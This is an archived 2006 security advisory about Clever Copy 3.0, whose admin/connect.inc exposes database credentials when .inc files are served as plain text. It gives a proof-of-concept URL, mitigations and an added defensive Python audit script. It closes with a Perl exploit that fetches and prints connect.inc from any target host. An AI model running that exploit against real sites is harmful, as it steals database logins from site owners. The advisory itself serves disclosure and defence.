Securityvulns SECURITYVULNS:DOC:12126
History: Apr 10, 2006 - 12:00 a.m.

[ECHO_ADV_28$2006] Clever Copy <= 3.0 Connect.inc Critical Information Disclosure


ECHO_ADV_28$2006



Author : M.Hasran Addahroni
Date : April, 7th 2006
Location : Indonesia, Bali
Web : http://advisories.echo.or.id/adv/adv28-K-159-2006.txt
Critical Lvl : Medium

Affected software description:



Application : Clever Copy 
version     : 3.01 
URL         : http://clevercopy.bestdirectbuy.com/
Description :

Clever Copy is a free, fully scalable web site portal and news posting system. You can run it as a very simple blog or ramp it up to a full Content Management System. It is easy to set up, use and maintain, requiring no previous knowledge of web portals, blogs, PHP, CMSs or databases.

---------------------------------------------------------------------------

Vulnerability:
~~~~~~~~~~~~~~~~
The critical connect.inc file in the admin folder is vulnerable to direct access, which lets anyone view 'critical' information: the database username and password.

------------------connect.inc-----------------------------------
<?php
..
//ENTER THE SETTINGS FOR THE CONNECTION TO YOUR DATABASE BELOW
$Host = "localhost"; // The hostname for your server. localhost works for most database servers or you may have to contact your hosts if you don't know
$Dbase = "clevercopy"; // The name of your database on your database server
$User = "test";  // The username required to connect to your database
$Pass = "test123"; // The password required to connect to your database
..
?>
------------------------------------------------------------------

This works when *.inc files are not declared in httpd.conf, so the server returns the file as plain text instead of passing it to PHP.

Poc:
~~~~~~~~~~~~

http://www.example.com/[clevercopy_path]/admin/connect.inc

Solution:
~~~~~~~~~

Rename connect.inc to connect.inc.php, or declare *.inc in httpd.conf, to protect against this vulnerability.
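
An added example (not part of the original advisory, and not Clever Copy or echo.or.id code): a Python check a site owner can run against a document root and the text of httpd.conf to list .inc files that hold credential-style PHP variables and would be served as plain text. All function names and sample inputs are hypothetical and constructed; the <FilesMatch> deny rule it also accepts is an extra mitigation beyond the two the advisory names.

```python
import re
import tempfile
from pathlib import Path

# Apache directives that keep *.inc from being served as plain text:
# hand the extension to PHP, or deny requests for it.
HANDLER_RE = re.compile(r'^\s*Add(?:Type|Handler)\s+\S*php\S*\s+[^\n#]*\.inc\b', re.I | re.M)
DENY_BLOCK_RE = re.compile(r'<Files(?:Match)?\b[^>]*\.inc[^>]*>(.*?)</Files', re.I | re.S)
DENY_RULE_RE = re.compile(r'Require\s+all\s+denied|Deny\s+from\s+all', re.I)
# Credential-looking PHP assignments such as $User = ... / $Pass = ...
SECRET_RE = re.compile(r'^\s*\$(\w*(?:pass|pwd|user)\w*)\s*=', re.I | re.M)

# Constructed sample inputs (the .inc body mirrors the excerpt in the advisory).
SAMPLE_INC = '<?php\n$Host = "localhost";\n$Dbase = "clevercopy";\n$User = "test";\n$Pass = "test123";\n?>\n'
WEAK_CONF = 'AddType application/x-httpd-php .php\n'        # .inc not declared
PHP_CONF = 'AddType application/x-httpd-php .php .inc\n'    # .inc executed by PHP
DENY_CONF = '<FilesMatch "\\.inc$">\n    Require all denied\n</FilesMatch>\n'


def inc_is_protected(conf_text):
    """True if the config maps .inc to PHP or denies requests for it."""
    conf = re.sub(r'^\s*#.*$', '', conf_text, flags=re.M)  # ignore commented-out lines
    if HANDLER_RE.search(conf):
        return True
    return any(DENY_RULE_RE.search(body) for body in DENY_BLOCK_RE.findall(conf))


def exposed_inc_files(docroot, conf_text):
    """Return [(relative path, [variable names])] for .inc files served raw."""
    if inc_is_protected(conf_text):
        return []
    hits = []
    for path in sorted(Path(docroot).rglob('*.inc')):
        names = SECRET_RE.findall(path.read_text(errors='replace'))
        if names:
            hits.append((path.relative_to(docroot).as_posix(), names))
    return hits


def run_demo():
    """Build a throwaway docroot with admin/connect.inc and audit it three ways."""
    with tempfile.TemporaryDirectory() as root:
        admin = Path(root, 'admin')
        admin.mkdir()
        (admin / 'connect.inc').write_text(SAMPLE_INC)
        return {name: exposed_inc_files(root, conf)
                for name, conf in (('weak', WEAK_CONF), ('php', PHP_CONF), ('deny', DENY_CONF))}


if __name__ == '__main__':
    for name, hits in run_demo().items():
        print(name, hits)
```

The check is a static text match: it does not evaluate virtual-host scope or per-directory .htaccess overrides, so a clean result should still be confirmed against the running server's effective configuration.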

---------------------------------------------------------------------------
Shoutz:
~~~~~~~

~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,anonymous,kaiten
~ masterpop3,maSter-oP,Lieur-Euy,Mr_ny3m,bithedz,murp,an0maly,fleanux,baylaw
~ SinChan,x`shell,tety,sakitjiwa, m_beben, rizal, cR4SH3R, metalsploit,FeNNi
~ [email protected] 
~ #aikmel #e-c-h-o @irc.dal.net
---------------------------------------------------------------------------
Contact:
~~~~~~~~

     K-159 || echo|staff || eufrato[at]gmail[dot]com
     Homepage: http://k-159.echo.or.id/

-------------------------------- [ EOF ] ----------------------------------

Perl Exploit:
~~~~~~~~~~~~

#!/usr/bin/perl 
#
# Clever Copy <= 3.0 connect.inc Critical Information disclosures Exploit
# Bug found & code by K-159 
# Base on advisory at http://advisories.echo.or.id/adv/adv28-K-159-2006.txt
# 
# Description :
#  Critical connect.inc file in admin folder are vulnerable to direct access
#  to view 'critical' information about the database username and password.
#
#  <?php
#   ...
#  //ENTER THE SETTINGS FOR THE CONNECTION TO YOUR DATABASE BELOW
#   $Host = "localhost"; // The hostname for your server. localhost works for most database servers or you may have to contact your hosts if you don't know
#   $Dbase = "clevercopy"; // The name of your database on your database server
#   $User = "test";  // The username required to connect to your database
#   $Pass = "test123"; // The password required to connect to your database
#  ...   
#   ?> 
#
#  Its works when file *.inc not declare in httpd.conf
#
# Poc :
#  http://www.example.com/[clevercopy_path]/admin/connect.inc
#
# usage:
# perl celevercopy.pl www.target.com
#
# www.echo.or.id (c) 2006
#
# Greetz : echo|staff, aikmel|crew, masterpop3, SinChan, sakitjiwa, etc
# contact : eufrato[at]gmail.com www.echo.or.id
#
print "\n=======================================================\n";
print "* Clever Copy connect.inc Critical Information Disclosure Exploit by K-159  *\n";
print "*             www.echo.or.id #e-c-h-o irc.dal.net        *\n";
print "==========================================================\n";
require LWP::UserAgent;

if(@ARGV == 1)
        {

$target= $ARGV[0];

my $ua = LWP::UserAgent->new;
$ua->agent("MSIE/6.0 Windows");
$ua->timeout(10);
$ua->env_proxy;

my @url = ("http://$target/admin/connect.inc");

foreach my $urlz (@url) {
            my $injek = $ua->get($urlz);
            print "\n-------------------------------\n";
            if ($injek->is_success)
                 {   print $injek->content;} 
            else
                 {die $injek->status_line;}
            print "\n-------------------------------\n";

}
}
else {
print "\n Use: perl $0 [www.target.com] \n";
}